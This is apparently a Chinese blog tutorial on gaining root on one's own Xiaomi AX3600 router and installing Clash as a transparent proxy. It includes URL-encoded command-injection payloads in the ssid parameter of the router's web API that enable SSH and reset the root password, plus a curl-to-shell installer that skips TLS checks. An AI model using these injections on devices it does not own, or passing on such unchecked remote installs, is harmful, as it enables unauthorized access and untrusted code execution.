AX3600 开启 ssh 并使用 Clash 实现透明代理
整了台小米路由器 AX3600 玩 我没有 root 权限会死所以root 了下,发现还能用 clash
获取 root 权限并打开 ssh
使用官方固件漏洞开启 ssh
先需要将固件版本降级到1.0.17
,固件可以在这里下载。
连接上 wifi 并打开路由器管理页面
登录后浏览器地址栏应该是这样的:
1 | http://192.168.31.1/cgi-bin/luci/;stok=<STOK>/web/home#router |
复制记下这个<STOK>
把下面 URL 中的<STOK>
替换成刚才的,并访问
1 | http://192.168.31.1/cgi-bin/luci/;stok=<STOK>/api/misystem/set_config_iotdev?bssid=Xiaomi&user_id=longdike&ssid=-h%3B%20nvram%20set%20ssh_en%3D1%3B%20nvram%20commit%3B%20sed%20-i%20's%2Fchannel%3D.*%2Fchannel%3D%5C%22debug%5C%22%2Fg'%20%2Fetc%2Finit.d%2Fdropbear%3B%20%2Fetc%2Finit.d%2Fdropbear%20start%3B |
会显示{"code":0}
再来一个 URL,注意替换STOK
1 | http://192.168.31.1/cgi-bin/luci/;stok=<STOK>/api/misystem/set_config_iotdev?bssid=Xiaomi&user_id=longdike&ssid=-h%3B%20echo%20-e%20'admin%5Cnadmin'%20%7C%20passwd%20root%3B |
到这里 ssh 就成功打开了
可以使用用户名 root+密码 admin 来 ssh 登录路由器
1 | ssh [email protected] |
输入密码回车后可以看到
1 | BusyBox v1.25.1 (YYYY-MM-DD HH:mm:ss UTC) built-in shell (ash) |
这个 RUOK 就很灵性
更改密码及权限维持
重新设置 root 密码
1 | passwd root |
这样并不能保证升级后 ssh 仍能使用,如果留在这个版本漏洞还是有一定风险。
备份
1 | nanddump -f /tmp/bdata_mtd9.img /dev/mtd9 |
用你喜欢的方式下载bdata_mtd9.img
,我使用 scp 命令
1 | scp [email protected]:/tmp/bdata_mtd9.img ~/ |
下载fuckax3600
(作者:paldier) 并传到路由器的/tmp
目录
1 | scp ~/Downloads/fuckax3600 [email protected]:/tmp/ |
1 | chmod +x /tmp/fuckax3600 |
等待路由器重启后
1 | /tmp/fuckax3600 hack |
会自动设置永久 ssh、telnet、uart 权限,同时会计算出默认的 root 密码,注意记录密码,恢复出厂后 telnet 和 ssh 需要用
1 | /tmp/fuckax3600 lock |
然后就可以升级新版本了,如果升级完新版本 ssh 不能用
使用 telnet 登录
1 | telnet 192.168.31.1 |
1 | sed -i 's/channel=.*/channel="debug"/g' /etc/init.d/dropbear |
安装 clash 作为透明代理
这里使用一键脚本ShellClash
1 | sh -c "$(curl -kfsSl https://cdn.jsdelivr.net/gh/juewuy/ShellClash@latest/install.sh)" && source /etc/profile &> /dev/null |
使用clash
命令就能打开管理脚本
参考
-
[AX3600] 小米 ax3600 获取 root 权限【简单快速】【修复丢 ssid】
-
juewuy/ShellClash
-
Clash for Miwifi 安装及使用教程